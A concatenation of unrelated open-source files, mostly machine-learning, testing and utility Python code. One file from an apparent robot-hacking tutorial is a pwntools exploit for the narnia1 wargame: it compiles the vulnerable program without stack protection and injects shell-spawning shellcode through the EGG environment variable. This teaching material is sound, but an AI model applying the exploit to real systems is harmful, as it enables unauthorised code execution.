new_im.paste(old_im, ((new_size[0]-old_size[0])/2,
(new_size[1]-old_size[1])/2))
# new_im.show()
# new_im.save('someimage.jpg')
return new_im
def predict_image_name(image_path_name):
logging.debug('image_path_name {}'.format(image_path_name))
candidates = selective_search_bbox(image_path_name)
logging.debug('candidates {}'.format(candidates))
image_name = image_path_name.split('/')[-1].split('.')[0]
logging.debug('image_name {}'.format(image_name))
# img = Image.open(image_path_name)
# logging.debug('{} {} {}'.format(img.format, img.size, img.mode))
#img2 = img.crop((0, 0, 100, 100))
# img2.save("img2.jpg")
# img2.show()
#crop_img = img[200:400, 100:300] # Crop from x, y, w, h -> 100, 200, 300, 400
# NOTE: its img[y: y + h, x: x + w] and *not* img[x: x + w, y: y + h]
# img = cv2.imread(image_path_name)
# fig, ax = plt.subplots(ncols=1, nrows=1, figsize=(6, 6))
img_read = Image.open(image_path_name)
logging.debug('{} {} {}'.format(img_read.format, img_read.size, img_read.mode))
# img_read.show()
i=0
for x, y, w, h in (candidates):
# left, upper, right, and lower pixel; The cropped section includes the left column and
# the upper row of pixels and goes up to (but doesn't include) the right column and bottom row of pixels
img_crop = img_read.crop((y, x, y+w, x+h))
img_crop.save('temp/test/'+ image_name + '_' + str(i) + '_cropped_' + '.jpg')
logging.debug('img_crop {} {} {}'.format(img_crop.format, img_crop.size, img_crop.mode))
img_crop_resize = img_crop.resize((img_width, img_height))
img_crop_resize.save('temp/test/'+ image_name + '_' + str(i) + '_cropped_resize' + '.jpg')
logging.debug('img_crop_resize {} {} {}'.format(img_crop_resize.format, img_crop_resize.size, img_crop_resize.mode))
i=i+1
# crop_img = img[x:y, w:h] # Crop from x, y, w, h -> 100, 200, 300, 400
# logging.debug('crop_img {}'.format(crop_img.shape))
# ax.imshow(crop_img)
# # cv2.imshow('cropped', crop_img)
# # cv2.waitKey(0)
# plt.show()
# # Convert Image to array
# img = PIL.Image.open("foo.jpg").convert("L")
# arr = numpy.array(img)
# # Convert array to Image
# img = PIL.Image.fromarray(arr)
# img = cv2.resize(cv2.imread(image_path_name), (224, 224)).astype(np.float32)
# img2.save('temp/test/img_'+str(i)+'.jpg')
# img3 = img2.thumbnail((img_width, img_height))
# logging.debug('img3 {}'.format(type(img3)))
# # img3.save('temp/test/img_'+str(i)+'_resized.jpg')
# logging.debug('{} {} {}'.format(img3.format, img3.size, img3.mode))
# img4 = pad_and_crop_image(img3, img_width, img_height)
# logging.debug('{} {} {}'.format(img4.format, img4.size, img4.mode))
# img4.save('temp/test/img_'+str(i)+'_resized1.jpg')
img=np.array(img_crop_resize).astype(np.float32)
img[:,:,0] -= 103.939
img[:,:,1] -= 116.779
img[:,:,2] -= 123.68
#img = img.transpose((2,0,1))
img = np.expand_dims(img, axis=0)
prediction = model.predict(img, batch_size, verbose=1)
logging.debug('\n\nprediction \n{}'.format(prediction))
for index,preds in enumerate(prediction):
for pred in preds:
logging.debug('pred {0:6f}'.format(float(pred)))
### MAIN ###
#evaluate_test_dataset()
#predict_image_dir()
# #image='dataset/test/Jeans/img_Distressed_Skinny_Jeans_img_00000004.jpg'
# #image='sample_images/test/img_Distressed_Denim_Jeans_img_00000001.jpg'
# image='sample_images/test/img_Acid_Wash_Denim_Romper_img_00000070.jpg'
image='sample_images/test/img_Acid_Wash_-_Skinny_Jeans_img_00000005.jpg'
#image='sample_images/test/img_Boxy_Faux_Fur_Jacket_img_00000001.jpg'
#image='sample_images/test/img_Athletic_Marled_Knit_Joggers_img_00000009.jpg'
predict_image_name(image)
|
tensorflow_graphics/rendering/tests/splat_with_opengl_test.py | sarvex/graphics | 2,759 | 12775993 | <filename>tensorflow_graphics/rendering/tests/splat_with_opengl_test.py<gh_stars>1000+
# Copyright 2020 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for rasterize than splat functionality with opengl rasterization."""
from tensorflow_graphics.rendering import rasterization_backend
from tensorflow_graphics.rendering.tests import splat_test
from tensorflow_graphics.util import test_case
class SplatWithOpenGLTest(splat_test.SplatTest):
def setUp(self):
super().setUp()
# This pattern was chosen instead of a parametrized test to faclitate
# running the test cases in pure CPU mode on machines that do not have a
# GPU. In this case the opengl rasterizer cannot be added as dependency to
# the binary as CPU only machines do not have the required libEGL.so
# available. This pattern provides a separate build target for the opengl
# rasterizer version.
self._backend = rasterization_backend.RasterizationBackends.OPENGL
if __name__ == '__main__':
test_case.main()
|
Python/neon_numbers.py | MjCode01/DS-Algo-Point | 1,148 | 12776001 | # Neon number --> If the sum of digits of the squared numbers are equal to the orignal number , the number is said to be Neon number. Example 9
ch=int(input("Enter 1 to do it with loop and 2 without loop :\n"))
n= int(input("Enter the number :\n"))
def number(n):
sq= n**2
digisum=0
while sq>0:
r=sq%10
digisum = digisum + r
sq=sq//10
if (n==digisum):
print("The number is neon number")
else:
print("Not a neon mumber")
# Without Loop
def number2(n):
sq=n*n
r=sq%10
q=sq//10
tocheck=r+q
if n==tocheck:
print("It is a Neon Number")
else:
print("Not a neon number")
if ch==1:
number(n)
elif ch==2:
number2(n)
else:
print("Enter correct choice")
"""
Time complexity - O(1)
Space complexity - O(1)
I/o--
Enter 1 to do it with loop and 2 without loop :
2
Enter the number :
9
It is a Neon Number
Explanation
Input n: 9
sq=81
r=1
q=8
tocheck=8+1 =>9
Output
if 9 == 9 ==> Neon number
"""
|
src/python/nimbusml/linear_model/symsgdbinaryclassifier.py | michaelgsharp/NimbusML | 134 | 12776039 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------------------------
# - Generated by tools/entrypoint_compiler.py: do not edit by hand
"""
SymSgdBinaryClassifier
"""
__all__ = ["SymSgdBinaryClassifier"]
from sklearn.base import ClassifierMixin
from ..base_predictor import BasePredictor
from ..internal.core.linear_model.symsgdbinaryclassifier import \
SymSgdBinaryClassifier as core
from ..internal.utils.utils import trace
class SymSgdBinaryClassifier(
core,
BasePredictor,
ClassifierMixin):
"""
Train an symbolic SGD model.
.. remarks::
Stochastic gradient descent (SGD) is a well known method for
regression and classification
tasks, and is primarily a sequential algorithm. The
``SymSgdBinaryClassifier`` is an
implementation of a parallel SGD algorithm that, to a first-order
approximation, retains the
sequential semantics of SGD. Each thread learns a local model as well
a `model combiner`
which allows local models to be combined to to produce what a
sequential model would have
produced.
**Reference**
`Parallel Stochastic Gradient Descent with Sound Combiners
<https://arxiv.org/pdf/1705.08030.pdf>`_
:param feature: see `Columns </nimbusml/concepts/columns>`_.
:param label: see `Columns </nimbusml/concepts/columns>`_.
:param normalize: Specifies the type of automatic normalization used:
* ``"Auto"``: if normalization is needed, it is performed
automatically. This is the default choice.
* ``"No"``: no normalization is performed.
* ``"Yes"``: normalization is performed.
* ``"Warn"``: if normalization is needed, a warning
message is displayed, but normalization is not performed.
Normalization rescales disparate data ranges to a standard scale.
Feature
scaling insures the distances between data points are proportional
and
enables various optimization methods such as gradient descent to
converge
much faster. If normalization is performed, a ``MaxMin`` normalizer
is
used. It normalizes values in an interval [a, b] where ``-1 <= a <=
0``
and ``0 <= b <= 1`` and ``b - a = 1``. This normalizer preserves
sparsity by mapping zero to zero.
:param caching: Whether trainer should cache input training data.
:param number_of_iterations: Number of passes over the data.
:param learning_rate: Determines the size of the step taken in the
direction of the gradient in each step of the learning process. This
determines how fast or slow the learner converges on the optimal
solution. If the step size is too big, you might overshoot the optimal
solution. If the step size is too small, training takes longer to
converge to the best solution.
:param l2_regularization: L2 regularization.
:param number_of_threads: Degree of lock-free parallelism. Determinism not
guaranteed. Multi-threading is not supported currently.
:param tolerance: Tolerance for difference in average loss in consecutive
passes.
:param update_frequency: The number of iterations each thread learns a
local model until combining it with the global model. Low value means
more updated global model and high value means less cache traffic.
:param memory_size: Memory size for L-BFGS. Lower=faster, less accurate.
The technique used for optimization here is L-BFGS, which uses only a
limited amount of memory to compute the next step direction. This
parameter indicates the number of past positions and gradients to store
for the computation of the next step. Must be greater than or equal to
``1``.
:param shuffle: Shuffle data?.
:param positive_instance_weight: Apply weight to the positive class, for
imbalanced data.
:param params: Additional arguments sent to compute engine.
.. seealso::
:py:class:`LogisticRegressionBinaryClassifier
<nimbusml.linear_model.LogisticRegressionBinaryClassifier>`,
:py:class:`SgdBinaryClassifier
<nimbusml.linear_model.SgdBinaryClassifier>`,
:py:class:`FastLinearBinaryClassifier
<nimbusml.linear_model.FastLinearBinaryClassifier>`
.. index:: models, parallel, SGD, symbolic
Example:
.. literalinclude:: /../nimbusml/examples/SymSgdBinaryClassifier.py
:language: python
"""
@trace
def __init__(
self,
normalize='Auto',
caching='Auto',
number_of_iterations=50,
learning_rate=None,
l2_regularization=0.0,
number_of_threads=None,
tolerance=0.0001,
update_frequency=None,
memory_size=1024,
shuffle=True,
positive_instance_weight=1.0,
feature=None,
label=None,
**params):
if 'feature_column_name' in params:
raise NameError(
"'feature_column_name' must be renamed to 'feature'")
if feature:
params['feature_column_name'] = feature
if 'label_column_name' in params:
raise NameError(
"'label_column_name' must be renamed to 'label'")
if label:
params['label_column_name'] = label
BasePredictor.__init__(self, type='classifier', **params)
core.__init__(
self,
normalize=normalize,
caching=caching,
number_of_iterations=number_of_iterations,
learning_rate=learning_rate,
l2_regularization=l2_regularization,
number_of_threads=number_of_threads,
tolerance=tolerance,
update_frequency=update_frequency,
memory_size=memory_size,
shuffle=shuffle,
positive_instance_weight=positive_instance_weight,
**params)
self.feature = feature
self.label = label
@trace
def predict_proba(self, X, **params):
'''
Returns probabilities
'''
return self._predict_proba(X, **params)
@trace
def decision_function(self, X, **params):
'''
Returns score values
'''
return self._decision_function(X, **params)
def get_params(self, deep=False):
"""
Get the parameters for this operator.
"""
return core.get_params(self)
|
homeassistant/components/derivative/__init__.py | domwillcode/home-assistant | 22,481 | 12776049 | """The derivative component."""
|
Codes/gracekoo/interview_8.py | ghoslation/algorithm | 256 | 12776092 | # -*- coding: utf-8 -*-
# @Time: 2020/7/16 11:38
# @Author: GraceKoo
# @File: interview_8.py
# @Desc: https://www.nowcoder.com/practice/8c82a5b80378478f9484d87d1c5f12a4?tpId=13&rp=1&ru=%2Fta%2Fcoding-interviews&qr
# u=%2Fta%2Fcoding-interviews%2Fquestion-ranking
class Solution:
def climbStairs(self, n: int) -> int:
if 0 <= n <= 2:
return n
dp = [i for i in range(n)]
dp[0] = 1
dp[1] = 2
for i in range(2, n):
dp[i] = dp[i - 1] + dp[i - 2]
return dp[-1]
so = Solution()
print(so.climbStairs(3))
|
tests/components/slack/__init__.py | tbarbette/core | 22,481 | 12776095 | <reponame>tbarbette/core
"""Slack notification tests."""
|
LeetCode/python3/47.py | ZintrulCre/LeetCode_Archiver | 279 | 12776107 | <reponame>ZintrulCre/LeetCode_Archiver<gh_stars>100-1000
class Solution:
def permuteUnique(self, nums: List[int]) -> List[List[int]]:
def BackTrack(m, per: list):
if m == n:
if per not in permutation:
permutation.append(per)
return per
for i in range(n):
if not visited[i]:
per.append(nums[i])
visited[i] = True
per = BackTrack(m + 1, per)
per = per[:-1]
visited[i] = False
return per
n = len(nums)
visited = [False for _ in range(n)]
per = []
permutation = []
BackTrack(0, [])
return list(set(tuple(k) for k in permutation))
|
Trakttv.bundle/Contents/Libraries/Shared/oem/media/show/__init__.py | disrupted/Trakttv.bundle | 1,346 | 12776127 | <reponame>disrupted/Trakttv.bundle
from oem.media.show.identifier import EpisodeIdentifier # NOQA
from oem.media.show.mapper import ShowMapper # NOQA
from oem.media.show.match import EpisodeMatch # NOQA
|
tests/fork/conftest.py | AqualisDAO/curve-dao-contracts | 217 | 12776163 | <gh_stars>100-1000
import pytest
from brownie_tokens import MintableForkToken
class _MintableTestToken(MintableForkToken):
def __init__(self, address):
super().__init__(address)
@pytest.fixture(scope="session")
def MintableTestToken():
yield _MintableTestToken
@pytest.fixture(scope="module")
def USDC():
yield _MintableTestToken("<KEY>")
@pytest.fixture(scope="module")
def ThreeCRV():
yield _MintableTestToken("0x6c3F90f043a72FA612cbac8115EE7e52BDe6E490")
@pytest.fixture(scope="module")
def SUSD():
yield _MintableTestToken("0x57ab1ec28d129<PASSWORD>52df4df418<PASSWORD>a2d46d5f51")
@pytest.fixture(scope="module")
def SBTC():
yield _MintableTestToken("0xfE18be6b3Bd88A2D2A7f928d00292E7a9963CfC6")
|
bleurt/score_test.py | yongchanghao/bleurt | 416 | 12776167 | <reponame>yongchanghao/bleurt
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for scoring function."""
import os
from bleurt import score
import tensorflow.compat.v1 as tf
tf.enable_eager_execution()
references = [
"An apple a day keeps the doctor away.",
"An apple a day keeps the doctor away."
]
candidates = [
"An apple a day keeps the doctor away.",
"An apple a day keeps doctors away."
]
ref_scores = [0.910811, 0.771989]
def get_test_checkpoint():
pkg = os.path.abspath(__file__)
pkg, _ = os.path.split(pkg)
ckpt = os.path.join(pkg, "test_checkpoint")
assert tf.io.gfile.exists(ckpt)
return ckpt
class ScoreTest(tf.test.TestCase):
def test_default_bleurt_score(self):
bleurt = score.BleurtScorer()
scores = bleurt.score(references=references, candidates=candidates)
self.assertLen(scores, 2)
self.assertAllClose(scores, ref_scores)
def test_positional_args_error(self):
bleurt = score.BleurtScorer()
with self.assertRaises(AssertionError):
_ = bleurt.score(references, candidates)
def test_bleurt_nulls(self):
bleurt = score.BleurtScorer()
test_references = []
test_candidates = []
scores = bleurt.score(
references=test_references, candidates=test_candidates)
self.assertLen(scores, 0)
def test_bleurt_empty(self):
bleurt = score.BleurtScorer()
test_references = [""]
test_candidates = [""]
scores = bleurt.score(
references=test_references, candidates=test_candidates)
self.assertLen(scores, 1)
def test_bleurt_score_with_checkpoint(self):
checkpoint = get_test_checkpoint()
bleurt = score.BleurtScorer(checkpoint)
scores = bleurt.score(references=references, candidates=candidates)
self.assertLen(scores, 2)
self.assertAllClose(scores, ref_scores)
def test_tf_bleurt_score_eager(self):
# Creates the TF Graph.
bleurt_ops = score.create_bleurt_ops()
tfcandidates = tf.constant(candidates)
tfreferences = tf.constant(references)
bleurt_out = bleurt_ops(references=tfreferences, candidates=tfcandidates)
# Computes the BLEURT scores.
self.assertIn("predictions", bleurt_out)
self.assertEqual(bleurt_out["predictions"].shape, (2,))
self.assertAllClose(bleurt_out["predictions"], ref_scores)
def test_tf_bleurt_positional_args_error(self):
# Creates the TF Graph.
bleurt_ops = score.create_bleurt_ops()
tfcandidates = tf.constant(candidates)
tfreferences = tf.constant(references)
with self.assertRaises(AssertionError):
_ = bleurt_ops(tfreferences, tfcandidates)
if __name__ == "__main__":
tf.test.main()
|
alphamind/portfolio/meanvariancebuilder.py | rongliang-tech/alpha-mind | 186 | 12776189 | # -*- coding: utf-8 -*-
"""
Created on 2017-6-27
@author: cheng.li
"""
from typing import Dict
from typing import Optional
from typing import Tuple
from typing import Union
import numpy as np
from alphamind.portfolio.optimizers import (
QuadraticOptimizer,
TargetVolOptimizer
)
from alphamind.exceptions.exceptions import PortfolioBuilderException
def _create_bounds(lbound,
ubound,
bm,
risk_exposure,
risk_target):
if lbound is not None:
lbound = lbound - bm
if ubound is not None:
ubound = ubound - bm
if risk_exposure is not None:
cons_mat = risk_exposure.T
bm_risk = cons_mat @ bm
clbound = (risk_target[0] - bm_risk).reshape((-1, 1))
cubound = (risk_target[1] - bm_risk).reshape((-1, 1))
else:
cons_mat = None
clbound = None
cubound = None
return lbound, ubound, cons_mat, clbound, cubound
def _create_result(optimizer, bm):
if optimizer.status() == "optimal" or optimizer.status() == "optimal_inaccurate":
return optimizer.status(), optimizer.feval(), optimizer.x_value() + bm
else:
raise PortfolioBuilderException(optimizer.status())
def mean_variance_builder(er: np.ndarray,
risk_model: Dict[str, Union[None, np.ndarray]],
bm: np.ndarray,
lbound: Union[np.ndarray, float, None],
ubound: Union[np.ndarray, float, None],
risk_exposure: Optional[np.ndarray],
risk_target: Optional[Tuple[np.ndarray, np.ndarray]],
lam: float = 1.,
linear_solver: str = 'deprecated') -> Tuple[str, float, np.ndarray]:
lbound, ubound, cons_mat, clbound, cubound = _create_bounds(lbound, ubound, bm, risk_exposure,
risk_target)
if cons_mat is not None:
cons_matrix = np.concatenate([cons_mat, clbound, cubound], axis=1)
else:
cons_matrix = None
cov = risk_model['cov']
special_risk = risk_model['idsync']
risk_cov = risk_model['factor_cov']
risk_exposure = risk_model['factor_loading']
prob = QuadraticOptimizer(objective=-er,
cons_matrix=cons_matrix,
lbound=lbound,
ubound=ubound,
penalty=lam,
cov=cov,
factor_cov=risk_cov,
factor_load=risk_exposure,
factor_special=special_risk)
if prob.status() == "optimal" or prob.status() == 'optimal_inaccurate':
return prob.status(), prob.feval(), prob.x_value() + bm
else:
raise PortfolioBuilderException(prob.status())
def target_vol_builder(er: np.ndarray,
risk_model: Dict[str, Union[None, np.ndarray]],
bm: np.ndarray,
lbound: Union[np.ndarray, float],
ubound: Union[np.ndarray, float],
risk_exposure: Optional[np.ndarray],
risk_target: Optional[Tuple[np.ndarray, np.ndarray]],
vol_target: float = 1.,
linear_solver: str = 'ma27') -> Tuple[str, float, np.ndarray]:
lbound, ubound, cons_mat, clbound, cubound = _create_bounds(lbound, ubound, bm, risk_exposure,
risk_target)
if cons_mat is not None:
cons_matrix = np.concatenate([cons_mat, clbound, cubound], axis=1)
else:
cons_matrix = None
cov = risk_model['cov']
special_risk = risk_model['idsync']
risk_cov = risk_model['factor_cov']
risk_exposure = risk_model['factor_loading']
prob = TargetVolOptimizer(objective=-er,
cons_matrix=cons_matrix,
lbound=lbound,
ubound=ubound,
target_vol=vol_target,
factor_cov=risk_cov,
factor_load=risk_exposure,
factor_special=special_risk,
cov=cov)
if prob.status() == "optimal" or prob.status() == 'optimal_inaccurate':
return prob.status(), prob.feval(), prob.x_value() + bm
else:
raise PortfolioBuilderException(prob.status())
|
code_sender/rstudio/__init__.py | fredcallaway/SendCode | 177 | 12776198 | import sublime
import os
from ..clipboard import clipboard
plat = sublime.platform()
if plat == "osx":
from ..applescript import osascript
RSTUDIOAPPLESCRIPT = os.path.join(os.path.dirname(__file__), "rstudio.applescript")
def send_to_rstudio(cmd):
osascript(RSTUDIOAPPLESCRIPT, cmd)
elif plat == "windows":
from .. import winauto
def send_to_rstudio(cmd, from_view):
rid = winauto.find_rstudio()
clipboard.set_clipboard(cmd)
winauto.paste_to_rstudio(rid, from_view=from_view)
clipboard.reset_clipboard()
elif plat == "linux":
from ..xdotool import xdotool
def send_to_rstudio(cmd):
wid = xdotool("search", "--onlyvisible", "--class", "rstudio")
if wid:
wid = wid.decode("utf-8").strip().split("\n")[-1]
clipboard.set_clipboard(cmd)
xdotool("key", "--window", wid, "ctrl+v")
xdotool("key", "--window", wid, "--clearmodifiers", "Return")
clipboard.reset_clipboard()
|
2_writeups/3_robot_exploitation/tutorial7/example5.py | araujorayza/robot_hacking_manual | 141 | 12776236 | #!/usr/bin/env python
from pwn import *
import os
# Exploiting vulnerable code narnia1.c:
#
# #include <stdio.h>
#
# int main(){
# int (*ret)();
#
# if(getenv("EGG")==NULL){
# printf("Give me something to execute at the env-variable EGG\n");
# exit(1);
# }
#
# printf("Trying to execute EGG!\n");
# ret = getenv("EGG");
# ret();
#
# return 0;
# }
# Define the context of the working machine
context(arch='amd64', os='linux')
# Compile the binary
log.info("Compiling the binary narnia1_local")
os.system('gcc narnia1.c -g -o narnia1_local -fno-stack-protector -z execstack')
# os.system('gcc narnia1.c -g -m32 -o narnia1_local -fno-stack-protector -z execstack')
# Get a simple shellcode
log.info("Putting together simple shellcode")
shellcode = asm(shellcraft.amd64.sh(), arch='amd64')
# print(shellcode)
log.info("Introduce shellcode in EGG env. variable")
os.environ["EGG"] = shellcode
log.info("Launching narnia1_local")
sh = process('narnia1_local')
sh.interactive()
|
metaflow/plugins/aws/aws_utils.py | Netflix/metaflow | 5,821 | 12776238 | <gh_stars>1000+
import re
def get_docker_registry(image_uri):
"""
Explanation:
(.+?(?:[:.].+?)\/)? - [GROUP 0] REGISTRY
.+? - A registry must start with at least one character
(?:[:.].+?)\/ - A registry must have ":" or "." and end with "/"
? - Make a registry optional
(.*?) - [GROUP 1] REPOSITORY
.*? - Get repository name until separator
(?:[@:])? - SEPARATOR
?: - Don't capture separator
[@:] - The separator must be either "@" or ":"
? - The separator is optional
((?<=[@:]).*)? - [GROUP 2] TAG / DIGEST
(?<=[@:]) - A tag / digest must be preceeded by "@" or ":"
.* - Capture rest of tag / digest
? - A tag / digest is optional
Examples:
image
- None
- image
- None
example/image
- None
- example/image
- None
example/image:tag
- None
- example/image
- tag
example.domain.com/example/image:tag
- example.domain.com/
- example/image
- tag
192.168.127.12:123/example/image:tag
- 192.168.127.12:123/
- example/image
- tag
example.domain.com/example/image@sha256:45b23dee0
- example.domain.com/
- example/image
- sha256:45b23dee0
"""
pattern = re.compile(r"^(.+?(?:[:.].+?)\/)?(.*?)(?:[@:])?((?<=[@:]).*)?$")
registry, repository, tag = pattern.match(image_uri).groups()
if registry is not None:
registry = registry.rstrip("/")
return registry |
textx/scoping/__init__.py | stanislaw/textX | 346 | 12776240 | <reponame>stanislaw/textX
#######################################################################
# Name: scoping.__init__.py
# Purpose: Meta-model / scope providers.
# Author: <NAME>
# License: MIT License
#######################################################################
import glob
import os
import errno
from os.path import join, exists, abspath
def metamodel_for_file_or_default_metamodel(filename, the_metamodel):
from textx import metamodel_for_file
from textx.exceptions import TextXRegistrationError
try:
return metamodel_for_file(filename)
except TextXRegistrationError:
return the_metamodel
# -----------------------------------------------------------------------------
# Scope helper classes:
# -----------------------------------------------------------------------------
class Postponed(object):
"""
Return an object of this class to postpone a reference resolution.
If you get circular dependencies in resolution logic, an error
is raised.
"""
class ModelRepository(object):
"""
This class has the responsibility to hold a set of (model-identifiers,
model) pairs as dictionary.
In case of some scoping providers the model-identifier is the absolute
filename of the model.
"""
def __init__(self):
self.name_idx = 1
self.filename_to_model = {}
def has_model(self, filename):
return abspath(filename) in self.filename_to_model
def add_model(self, model):
if model._tx_filename:
filename = abspath(model._tx_filename)
else:
filename = 'builtin_model_{}'.format(self.name_idx)
self.name_idx += 1
self.filename_to_model[filename] = model
def remove_model(self, model):
filename = None
for f, m in self.filename_to_model.items():
if m == model:
filename = f
if filename:
# print("*** delete {}".format(filename))
del self.filename_to_model[filename]
def __contains__(self, filename):
return self.has_model(filename)
def __iter__(self):
return iter(self.filename_to_model.values())
def __len__(self):
return len(self.filename_to_model)
def __getitem__(self, filename):
return self.filename_to_model[filename]
def __setitem__(self, filename, model):
self.filename_to_model[filename] = model
class GlobalModelRepository(object):
"""
This class has the responsibility to hold two ModelRepository objects:
- one for model-local visible models
- one for all models (globally, starting from some root model).
The second `ModelRepository` `all_models` is to cache already loaded models
and to prevent to load one model twice.
The class allows loading local models visible to the current model. The
current model is the model which references this `GlobalModelRepository` as
attribute `_tx_model_repository`
When loading a new local model, the current `GlobalModelRepository`
forwards the embedded `ModelRepository` `all_models` to the new
`GlobalModelRepository` of the next model. This is done using the
`pre_ref_resolution_callback` to set the necessary information before
resolving the references in the new loaded model.
"""
def __init__(self, all_models=None):
"""
Create a new repo for a model.
Args:
all_models: models to be added to this new repository.
"""
self.local_models = ModelRepository() # used for current model
if all_models is not None:
self.all_models = all_models # used to reuse already loaded models
else:
self.all_models = ModelRepository()
def remove_model(self, model):
self.all_models.remove_model(model)
self.local_models.remove_model(model)
def remove_models(self, models):
for m in models:
self.remove_model(m)
def load_models_using_filepattern(
self, filename_pattern, model, glob_args, is_main_model=False,
encoding='utf-8', add_to_local_models=True, model_params=None):
"""
Add a new model to all relevant objects.
Args:
filename_pattern: models to be loaded
model: model holding the loaded models in its _tx_model_repository
field (may be None).
glob_args: arguments passed to the glob.glob function.
Returns:
the list of loaded models
"""
from textx import get_metamodel
if model is not None:
self.update_model_in_repo_based_on_filename(model)
the_metamodel = get_metamodel(model) # default metamodel
else:
the_metamodel = None
filenames = glob.glob(filename_pattern, **glob_args)
if len(filenames) == 0:
raise IOError(
errno.ENOENT, os.strerror(errno.ENOENT), filename_pattern)
loaded_models = []
for filename in filenames:
the_metamodel = metamodel_for_file_or_default_metamodel(
filename, the_metamodel)
loaded_models.append(
self.load_model(the_metamodel, filename, is_main_model,
encoding=encoding,
add_to_local_models=add_to_local_models,
model_params=model_params))
return loaded_models
def load_model_using_search_path(
self, filename, model, search_path, is_main_model=False,
encoding='utf8', add_to_local_models=True, model_params=None):
"""
Add a new model to all relevant objects
Args:
filename: models to be loaded
model: model holding the loaded models in its _tx_model_repository
field (may be None).
search_path: list of search directories.
Returns:
the loaded model
"""
from textx import get_metamodel
if model:
self.update_model_in_repo_based_on_filename(model)
for the_path in search_path:
full_filename = join(the_path, filename)
# print(full_filename)
if exists(full_filename):
if model is not None:
the_metamodel = get_metamodel(model)
else:
the_metamodel = None
the_metamodel = metamodel_for_file_or_default_metamodel(
filename, the_metamodel)
return self.load_model(the_metamodel,
full_filename,
is_main_model,
encoding=encoding,
add_to_local_models=add_to_local_models,
model_params=model_params)
raise IOError(
errno.ENOENT, os.strerror(errno.ENOENT), filename)
def load_model(
self, the_metamodel, filename, is_main_model, encoding='utf-8',
add_to_local_models=True, model_params=None):
"""
Load a single model
Args:
the_metamodel: the metamodel used to load the model
filename: the model to be loaded (if not cached)
Returns:
the loaded/cached model
"""
assert model_params is not None,\
"model_params needs to be specified"
filename = abspath(filename)
if not self.local_models.has_model(filename):
if self.all_models.has_model(filename):
# print("CACHED {}".format(filename))
new_model = self.all_models[filename]
else:
# print("LOADING {}".format(filename))
# all models loaded here get their references resolved from the
# root model
new_model = the_metamodel.internal_model_from_file(
filename, pre_ref_resolution_callback=lambda
other_model: self.pre_ref_resolution_callback(other_model),
is_main_model=is_main_model, encoding=encoding,
model_params=model_params)
self.all_models[filename] = new_model
# print("ADDING {}".format(filename))
if add_to_local_models:
self.local_models[filename] = new_model
else:
# print("LOCALLY CACHED {}".format(filename))
pass
assert filename in self.all_models # to be sure...
return self.all_models[filename]
def _add_model(self, model):
filename = self.update_model_in_repo_based_on_filename(model)
# print("ADDED {}".format(filename))
self.local_models[filename] = model
def update_model_in_repo_based_on_filename(self, model):
"""
Adds a model to the repo (not initially visible)
Args:
model: the model to be added. If the model
has no filename, a name is invented
Returns:
the filename of the model added to the repo
"""
if model._tx_filename is None:
for fn in self.all_models.filename_to_model:
if self.all_models.filename_to_model[fn] == model:
# print("UPDATED/CACHED {}".format(fn))
return fn
i = 0
while self.all_models.has_model("anonymous{}".format(i)):
i += 1
myfilename = "anonymous{}".format(i)
self.all_models[myfilename] = model
else:
myfilename = abspath(model._tx_filename)
if (not self.all_models.has_model(myfilename)):
self.all_models[myfilename] = model
# print("UPDATED/ADDED/CACHED {}".format(myfilename))
return myfilename
def pre_ref_resolution_callback(self, other_model):
"""
internal: used to store a model after parsing into the repository
Args:
other_model: the parsed model
Returns:
nothing
"""
filename = other_model._tx_filename
# print("PRE-CALLBACK -> {}".format(filename))
assert (filename)
filename = abspath(filename)
other_model._tx_model_repository = \
GlobalModelRepository(self.all_models)
self.all_models[filename] = other_model
class ModelLoader(object):
"""
This class is an interface to mark a scope provider as an additional model
loader.
"""
def __init__(self):
pass
def load_models(self, model):
pass
def get_all_models_including_attached_models(model):
"""
get a list of all models stored within a model
(including the owning model).
@deprecated (BIC): use model_object.get_included_models()
Args:
model: the owning model
Returns:
a list of all models
"""
return get_included_models(model)
def get_included_models(model):
"""
get a list of all models stored within a model
(including the owning model).
Args:
model: the owning model
Returns:
a list of all models
"""
if (hasattr(model, "_tx_model_repository")):
models = list(model._tx_model_repository.all_models)
if model not in models:
models.append(model)
else:
models = [model]
return models
def is_file_included(filename, model):
"""
Determines if a file is included by a model. Also checks
for indirect inclusions (files included by included files).
Args:
filename: the file to be checked (filename is normalized)
model: the owning model
Returns:
True if the file is included, else False
(Note: if no _tx_model_repository is present,
the function always returns False)
"""
if (hasattr(model, "_tx_model_repository")):
all_entries = model._tx_model_repository.all_models
return all_entries.has_model(filename)
else:
return False
def remove_models_from_repositories(models,
models_to_be_removed):
"""
Remove models from all relevant repositories (_tx_model_repository
of models and related metamodel(s), if applicable).
Args:
models: the list of models from
which the models_to_be_removed have to be removed.
models_to_be_removed: models to be removed
Returns:
None
"""
assert isinstance(models, list)
for model in models:
if hasattr(model._tx_metamodel, "_tx_model_repository"):
model._tx_metamodel. \
_tx_model_repository.remove_models(models_to_be_removed)
if hasattr(model, "_tx_model_repository"):
model._tx_model_repository.remove_models(models_to_be_removed)
|
mpi4jax/_src/flush.py | Thenerdstation/mpi4jax | 122 | 12776281 | <reponame>Thenerdstation/mpi4jax
import jax
def flush(platform):
"""Wait for all pending XLA operations"""
devices = jax.devices(platform)
for device in devices:
# as suggested in jax#4335
noop = jax.device_put(0, device=device) + 0
noop.block_until_ready()
|
dask/dataframe/io/orc/__init__.py | Juanlu001/dask | 9,684 | 12776284 | <filename>dask/dataframe/io/orc/__init__.py
from .core import read_orc, to_orc
|
